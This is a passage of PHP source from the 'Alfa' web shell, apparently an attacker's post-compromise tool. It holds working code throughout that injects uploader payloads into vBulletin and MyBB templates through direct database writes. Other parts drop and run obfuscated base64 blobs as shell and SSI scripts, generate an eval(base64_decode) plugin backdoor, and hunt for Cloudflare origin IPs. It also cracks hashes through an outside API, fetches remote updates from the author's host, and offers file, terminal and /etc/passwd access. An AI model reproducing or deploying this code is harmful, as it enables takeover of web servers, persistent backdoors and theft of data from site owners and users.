                $shellCode = "{\${ALFA_UPLOADER}}";
                $newinshell = "{\${ALFA_UPLOADER}}";
                if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)) {
                    $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
                    $inject = "select template from {$prefix}templates where  title= 'calendar'";
                    $result = mysqli_query($conn, $inject) or die(mysqli_error($conn));
                    $GetTemp = mysqli_fetch_assoc($result);
                    $saveDate = $GetTemp['template'];
                    $repsave = str_replace($shellCode, "", $saveDate);
                    $repsave = str_replace("'", "\\'", $repsave);
                    $createShell = "update {$prefix}templates SET template= '" . $newinshell . $repsave . "' where title = 'calendar'";
                    $result2 = mysqli_query($conn, $createShell) or die(mysqli_error($conn));
                    $geturl = "select value from {$prefix}settings where name= 'bburl'";
                    $findurl = mysqli_query($conn, $geturl) or die(mysqli_error($conn));
                    $rowb = mysqli_fetch_assoc($findurl);
                    $furl = $rowb['value'];
                    $realurl = parse_url($furl, PHP_URL_HOST);
                    $realpath = parse_url($furl, PHP_URL_PATH);
                    $res = false;
                    $AlfaCurl = new AlfaCURL();
                    if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto') {
                        if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) {
                            @fputs($fsock, "GET {$realpath}/calendar.php HTTP/1.1\r\n");
                            @fputs($fsock, "HOST: {$realurl}\r\n");
                            @fputs($fsock, "Connection: close\r\n\r\n");
                            $check = fgets($fsock);
                            if (preg_match("/200 OK/i", $check)) {
                                $repairdbtemp = "update {$prefix}templates SET template= '{$repsave}' where title = 'calendar'";
                                $clear = mysqli_query($conn, $repairdbtemp) or die(mysqli_error($conn));
                                $res = true;
                            }
                            @fclose($fsock);
                        }
                    } elseif (function_exists('curl_version') && $method == 'auto') {
                        $AlfaCurl->Send($realurl . $realpath . "/calendar.php");
                        $res = true;
                    }
                    if ($res) {
                        $ff = 'http://' . $realurl . $realpath . "/solevisible.php";
                        output($ff);
                    } else {
                        $ff = 'http://' . $realurl . $realpath . "/calendar.php";
                        $fff = 'http://' . $realurl . $realpath . "/solevisible.php";
                        echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></b></center><br><br>";
                    }
                }
            }
        }
        if (isset($_POST['alfa3']) && $_POST['alfa3'] == 'vb') {
            AlfaNum(1, 2, 7, 9, 10);
            echo __pre() . '<p><div class="txtfont_header">| vbulletin |</div></p><p>' . getConfigHtml('vb') . '</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50'));
            create_table($table);
            echo $selector;
            echo "<p><input type=\"submit\" value=\" \" /></p></form></center>";
            if (isset($_POST['alfa4']) && !empty($_POST['alfa4'])) {
                $method = $_POST['alfa8'];
                $faq_name = "faq";
                $faq_file = "/faq.php";
                $code = "{\${ALFA_UPLOADER}}{\${exit()}}&";
                $conn = @mysqli_connect($_POST['alfa2'], $_POST['alfa4'], $_POST['alfa5'], $_POST['alfa7']) or die(@mysqli_connect_error());
                $rec = "select `template` from " . $_POST['alfa6'] . "template WHERE title ='" . $faq_name . "'";
                $recivedata = @mysqli_query($conn, $rec);
                $getd = @mysqli_fetch_assoc($recivedata);
                $savetoass = $getd['template'];
                if (empty($savetoass)) {
                    $faq_name = "header";
                    $faq_file = "/";
                    $rec = "select `template` from " . $_POST['alfa6'] . "template WHERE title ='" . $faq_name . "'";
                    $recivedata = @mysqli_query($conn, $rec);
                    $getd = @mysqli_fetch_assoc($recivedata);
                    $savetoass = $getd['template'];
                    $code = "ALFA_UPLOADER;";
                }
                $code = str_replace("'", "\\'", $code);
                $p = "UPDATE " . $_POST['alfa6'] . "template SET `template`='" . $code . "' WHERE `title`='" . $faq_name . "'";
                $ka = @mysqli_query($conn, $p) or die(mysqli_error($conn));
                $geturl = @mysqli_query($conn, "select `value` from " . $_POST['alfa6'] . "setting WHERE `varname`='bburl'");
                $getval = @mysqli_fetch_assoc($geturl);
                $saveval = $getval['value'];
                if ($faq_name == "header") {
                    if (substr($saveval, -5, 5) == "/core") {
                        $saveval = substr($saveval, 0, -5);
                    }
                }
                $realurl = parse_url($saveval, PHP_URL_HOST);
                $realpath = parse_url($saveval, PHP_URL_PATH);
                $res = false;
                $AlfaCurl = new AlfaCURL();
                if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto') {
                    if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) {
                        @fputs($fsock, "GET {$realpath}.{$faq_file} HTTP/1.1\r\n");
                        @fputs($fsock, "HOST: {$realurl}\r\n");
                        @fputs($fsock, "Connection: close\r\n\r\n");
                        $check = fgets($fsock);
                        if (preg_match("/200 OK/i", $check)) {
                            $p1 = "UPDATE " . $_POST['alfa6'] . "template SET template ='" . mysqli_real_escape_string($conn, $savetoass) . "' WHERE title ='" . $faq_name . "'";
                            $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn));
                            $res = true;
                        }
                        @fclose($fsock);
                    }
                } elseif (function_exists('curl_version') && $method == 'auto') {
                    $AlfaCurl->Send($realurl . $realpath . $faq_file);
                    $p1 = "UPDATE " . $_POST['alfa6'] . "template SET template ='" . mysqli_real_escape_string($conn, $savetoass) . "' WHERE title ='" . $faq_name . "'";
                    $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn));
                    $res = true;
                }
                if ($res) {
                    $ff = 'http://' . $realurl . $realpath . "/solevisible.php";
                    output($ff);
                } else {
                    $ff = 'http://' . $realurl . $realpath . $faq_file;
                    $fff = 'http://' . $realurl . $realpath . "/solevisible.php";
                    echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></center></p>";
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfacheckfiletype()
    {
        $path = $_POST['path'];
        $arg = $_POST['arg'];
        if (@is_file($path . '/' . $arg)) {
            echo "file";
        } else {
            echo "dir";
        }
    }
    function alfacheckupdate()
    {
        if ($GLOBALS["DB_NAME"]["cgi_api"]) {
            if (!isset($_COOKIE["alfacgiapi_mode"]) && !isset($_COOKIE["alfacgiapi"])) {
                _alfa_cgicmd("whoami", "perl", true);
                if (strlen(alfaEx("whoami", false, true)) > 0) {
                    __alfa_set_cookie("alfa_canruncmd", "true");
                }
            }
        }
        if (function_exists("curl_version")) {
            $update = new AlfaCURL();
            $json = $update->Send("http://solevisible.com/update.json?ver=4.1");
            $json = @json_decode($json, true);
            $data = array();
            if ($json) {
                if (!isset($_COOKIE['alfa_checkupdate']) && !empty($json["type"])) {
                    if ($json["type"] == "update") {
                        if (__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']) {
                            @setcookie("alfa_checkupdate", "1", time() + 86400);
                            $data["content"] = '<div class="update-holder">' . $json["content"] . '</div>';
                        }
                    }
                }
                if (isset($json["ads"]) && !empty($json["ads"])) {
                    $data["content"] .= $json["ads"];
                }
                if (isset($json["copyright"]) && !empty($json["copyright"])) {
                    $data["copyright"] = $json["copyright"];
                }
                if (isset($json["solevisible"]) && !empty($json["solevisible"])) {
                    $data["solevisible"] = $json["solevisible"];
                }
                if (isset($json["code_name"]) && !empty($json["code_name"])) {
                    $data["code_name"] = $json["code_name"];
                    $data["version_number"] = __ALFA_VERSION__;
                }
                if (isset($json["market"]) && !empty($json["market"])) {
                    $data["market"] = $json["market"];
                }
                echo @json_encode($data);
            }
        }
    }
    function alfaWriteTocgiapi($name, $source)
    {
        $temp = "";
        $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");
        if (in_array($name, $not_api)) {
            $temp = ALFA_TEMPDIR;
            if ($temp) {
                @chdir($temp);
            }
        } else {
            alfaCreateParentFolder();
            @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
        }
        @mkdir('alfacgiapi', 0755);
        __write_file("alfacgiapi/" . $name, __get_resource($source));
        @chmod("alfacgiapi/" . $name, 0755);
        return $temp;
    }
    function alfacheckcgi()
    {
        if (strlen(alfaEx("id", false, true, true)) > 0) {
            echo "ok";
        } else {
            echo "no";
        }
    }
    function alfaupdateheader()
    {
        if (!isset($_COOKIE["updateheader_data"])) {
            $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
            $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
            $tmp_path = alfaWriteTocgiapi("getheader.alfa", $bash);
            $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa", false, true, true);
            if (@is_array(@json_decode($data, true))) {
                __alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data));
                echo $data;
            }
        } else {
            echo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]);
        }
    }
    function alfassiShell()
    {
        alfahead();
        echo "<div class=header>";
        alfaCreateParentFolder();
        @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
        @mkdir('alfa_shtml', 0755);
        @chdir('alfa_shtml');
        alfacgihtaccess('shtml');
        $code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
        @__write_file('alfa_ssi.shtml', __get_resource($code));
        @chmod("alfa_ssi.shtml", 0755);
        echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
        echo "</div>";
        alfafooter();
    }
    function alfacloudflare()
    {
        alfahead();
        AlfaNum(8, 9, 10, 7, 6, 5, 4, 3);
        echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>\r\n<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
        if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
            $url = $_POST['alfa1'];
            if (!preg_match('/^(https?):\\/\\/(w{3}|w3)\\./i', $url)) {
                $url = preg_replace('/^(https?):\\/\\//', '', $url);
                $url = "http://www." . $url;
            }
            $headers = @get_headers($url, 1);
            $server = $headers['Server'];
            $subs = array('owa.', '2tty.', 'm.', 'gw.', 'mx1.', 'store.', '1', '2', 'vb.', 'news.', 'download.', 'video', 'cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.', 'search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.', 'books.', 'answers.', 'service.', 'groups.', 'images.', 'upload.', 'up.', 'tube.', 'users.', 'admin.', 'administrator.', 'private.', 'design.', 'whmcs.', 'wp.', 'wordpress.', 'joomla.', 'vbulletin.', 'test.', 'developer.', 'panel.', 'contact.');
            if (preg_match('/^(https?):\\/\\/(w{3}|w3)\\./i', $url, $matches)) {
                if ($matches[2] != 'www') {
                    $url = preg_replace('/^(https?):\\/\\//', '', $url);
                } else {
                    $url = explode($matches[0], $url);
                    $url = $url[1];
                }
            }
            if (is_array($server)) {
                $server = $server[0];
            }
            echo __pre();
            if (preg_match('/cloudflare/i', $server)) {
                echo "\n[+] CloudFlare detected: {$server}\n<br>";
            } else {
                echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
            }
            echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
            echo "[+] Searching for more IP addresses.\n\n<br><br>";
            for ($x = 0; $x < count($subs); $x++) {
                $site = $subs[$x] . $url;
                $ip = is_ipv4(gethostbyname($site));
                if ($ip == '(Null)') {
                    continue;
                }
                echo "Trying {$site}: {$ip}\n<br>";
            }
            echo "\n[+] Finished.\n<br>";
        }
        echo "</div>";
        alfafooter();
    }
    function is_ipv4($ip)
    {
        return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
    }
    function __alert($s)
    {
        echo '<center>' . __pre() . $s . '</center>';
    }
    function create_table($data)
    {
        echo "<table border=\"1\">";
        foreach ($data as $key => $val) {
            $array = array();
            foreach ($val as $k => $v) {
                $array[$k] = $v;
            }
            echo "<tr><td><div class='tbltxt'>" . $array['tdName'] . "</div></td><td><input type='text' id='" . $array['id'] . "' name='" . $array['inputName'] . "' " . ($array['placeholder'] ? 'placeholder' : 'value') . "='" . $array['inputValue'] . "' size='" . $array['inputSize'] . "' " . ($array['disabled'] ? 'disabled' : '') . "></td></tr>";
        }
        echo "</table>";
    }
    function alfaphp2xml()
    {
        alfahead();
        AlfaNum(8, 9, 10, 7, 6, 5, 4, 3);
        echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>\r\n<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>\r\n<input type='submit' name='go' value=' ' /></p></form></center>";
        if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
            echo __pre() . "<p><center><textarea rows='10' name='users' cols='80'>";
            echo '<?php xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\'' . __ZW5jb2Rlcg($_POST['alfa1']) . '\'));exit;}]]></phpcode></plugin></plugins>';
            echo "</textarea></center></p>";
        }
        echo "</center></div>";
        alfafooter();
    }
    function alfacpcrack()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick=\"g('cpcrack',null,'dec')\">| DeCrypter | </a><a href=javascript:void(0) onclick=\"g('cpcrack',null,'analyzer')\">| Hash Analyzer | </a></h3></center>";
        if ($_POST['alfa1'] == 'dec') {
            $algorithms = array('md5' => 'MD5', 'md4' => 'MD4', 'sha1' => 'SHA1', 'sha256' => 'SHA256', 'sha384' => 'SHA384', 'sha512' => 'SHA512', 'ntlm' => 'NTLM');
            echo "<center><div class=\"txtfont_header\">| DeCrypter |</div><br><br>\r\n<form onsubmit=\"g('cpcrack',null,'dec',this.md5.value,'>>',this.alg.value); return false;\"><div class=\"txtfont\">Decrypt Method:</div> <select name=\"alg\" style=\"width:100px;\">";
            foreach ($algorithms as $key => $val) {
                echo '<option value="' . $key . '">' . $val . '</option>';
            }
            echo "</select><input type=\"text\" placeholder=\"Hash\" name=\"md5\" size=\"60\" id=\"text\" /> <input type=\"submit\" value=\" \" name=\"go\" /></form></center><br>";
            if ($_POST['alfa3'] == '>>') {
                $hash = $_POST['alfa2'];
                if (!empty($hash)) {
                    $hash_type = $_POST['alfa4'];
                    $email = "google@gmail.com";
                    $code = "7b9fa79f92c3cd96";
                    $target = "https://md5decrypt.net/Api/api.php?hash=" . $hash . "&hash_type=" . $hash_type . "&email=" . $email . "&code=" . $code;
                    $resp = @file_get_contents($target);
                    if ($resp == '') {
                        $get = new AlfaCURL();
                        $resp = $get->Send($target);
                    }
                    echo __pre() . '<center>';
                    switch ($resp) {
                        case 'CODE ERREUR : 001':
                            echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";
                            break;
                        case 'CODE ERREUR : 003':
                            echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";
                            break;
                        case 'CODE ERREUR : 004':
                            echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";
                            break;
                        case 'CODE ERREUR : 005':
                            echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";
                            break;
                    }
                    if (substr($resp, 0, 4) != 'CODE' && $resp != '') {
                        echo "<b>Result: <font color='green'>" . $resp . "</font></b>";
                    } elseif (substr($resp, 0, 4) != 'CODE') {
                        echo "<font color='red'>NoT Found</font><br />";
                    }
                    echo "</center>";
                }
            }
        }
        if ($_POST['alfa1'] == 'analyzer') {
            echo "<center><p><div class=\"txtfont_header\">| Hash Analyzer |</div></p>\r\n<form onsubmit=\"g('cpcrack',null,'analyzer',this.hash.value,'>>');return false;\">\r\n<div class=\"txtfont\">Hash: </div> <input type=\"text\" placeholder=\"Hash\" name=\"hash\" size=\"60\" id=\"text\" /> <input type=\"submit\" value=\" \" name=\"go\" /></form></center><br>";
            if ($_POST['alfa3'] == '>>') {
                $hash = $_POST['alfa2'];
                if (!empty($hash)) {
                    $curl = new AlfaCURL();
                    $resp = $curl->Send("https://md5decrypt.net/en/HashFinder/", "post", "hash={$hash}&crypt=Search");
                    echo __pre() . '<center>';
                    if (preg_match('#<fieldset class="trouve">(.*?)</fieldset>#', $resp, $s)) {
                        echo '<font color="green">' . $s[1] . '</font>';
                    } else {
                        echo "<font color=\"red\">Not Found...!</font>";
                    }
                    echo "</center><br>";
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfafooter()
    {
        if (!isset($_POST['ajax'])) {
            echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >\r\n<tr>\r\n<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>\r\n<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>\r\n<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>\r\n<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='" . htmlspecialchars($GLOBALS['cwd']) . "'> <input type='submit' value=' '></form></td>\r\n<td colspan='2'><form onsubmit=\"editor(this.file.value,'view','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan='4'><form style='margin-top: 10px;' onsubmit=\"return false;\" autocomplete='off'><span><span class='footer_text'>Execute :</span><br><button onClick='alfaOpenPhpTerminal();return false;' class='foottable alfa_custom_cmd_btn'><img style='width:28px;vertical-align: middle;' src='http://solevisible.com/icons/menu/terminal.svg'> Terminal</button><br></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>\r\n<input type='hidden' name='a' value='FilesMAn'>\r\n<input type='hidden' name='c' value='" . $GLOBALS['cwd'] . "'>\r\n<input type='hidden' name='ajax' value='true'>\r\n<input type='hidden' name='alfa1' value='uploadFile'>\r\n<input type='hidden' name='charset' value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);' multiple></p><input type='submit' name='submit' value=' '></form><div id='alfa-copyright'><span class='copyright'>[ ./AlfaTeam &copy; 2012-" . date('Y') . " ]</span><br><span><a href='javascript:void(0);' onclick='alert(\"BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo\");' style='color: #E91E63;text-decoration: none;'>Donate Us !</a></span> <span style='letter-spacing: 2px;color: #dfff00;'>solevisible[at]gmail.com</span> <span><a style='color: #ff6060;text-decoration: none;' target='_blank' href='https://telegram.me/solevisible'>@solevisible</a></span></div></td>\r\n</tr>\r\n</table>\r\n</div>\r\n\r\n<div id='options_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"options_window\");'></div><div onClick='editorClose(\"options_window\");' class='close-button'></div></div></div><div style='height:100%;' class='content_options_holder'><div class='options_tab'></div><div class='options_content' style='margin-left:14px;margin-right:30px;background:#000;overflow:auto;'></div></div></div></div>\r\n\r\n<div id='database_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'>Sql Manager</div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"database_window\");'></div><div onClick='editorClose(\"database_window\");' class='close-button'></div></div></div><div class='content_options_holder' style='margin-left:14px;margin-right:30px;background:#000;max-height:90%;'><div class='sql-tabs'></div><div class='sql-contents' style='max-height: 85vh;'></div></div></div></div>\r\n\r\n<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='position:relative;margin-left:14px;margin-right:30px;'><div class='terminal-tabs'></div><div style='height:90%;' class='terminal-contents'></div></div></div></div>\r\n<div id='editor' style='display:none;'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div onclick='historyPanelController(this);' mode='visible' class='history-panel-controller'><<</div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'><div class='editor-tabs'></div><div class='editor-content-holder'></div></div></div></div></div></div>\r\n<div id='update-content'></div>\r\n<div id='database_window-minimized' onclick='showEditor(\"database_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div class='minimized-text' style='top: 15px;'>Database</div></div></div>\r\n<div id='options_window-minimized' onclick='showEditor(\"options_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 4px;' class='minimized-text'>Options</div></div></div>\r\n<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 2px;' class='minimized-text'>Editor</div></div></div>\r\n<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 12px;' class='minimized-text'>Cgi Shell</div></div></div>\r\n<div id='rightclick_menu'>\r\n  <a target='_blank' href='' name='newtab'><img src=\"http://solevisible.com/icons/menu/newtab.svg\"> Open in new tab</a>\r\n  <a target='_blank' href='' name='link'><img src=\"http://solevisible.com/icons/menu/link.svg\"> Open file directly</a>\r\n  <a href='javascript:void(0);' name='download'><img src=\"http://solevisible.com/icons/menu/download2.svg\"> Download</a>\r\n  <a href='' name='view'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View</a>\r\n  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='view_archive'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View Archive</a>\r\n  <a href='' name='edit'><img src=\"http://solevisible.com/icons/menu/edit.svg\"> Edit</a>\r\n  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"move\");' ftype='' path='' fname='' href='' href='' name='move'><img src=\"http://solevisible.com/icons/menu/move.svg\"> Move</a>\r\n  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"copy\");' ftype='' path='' fname='' href='' name='copy'><img src=\"http://solevisible.com/icons/menu/copy.svg\"> Copy</a>\r\n  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"rename\");' ftype='' path='' fname='' name='rename'><img 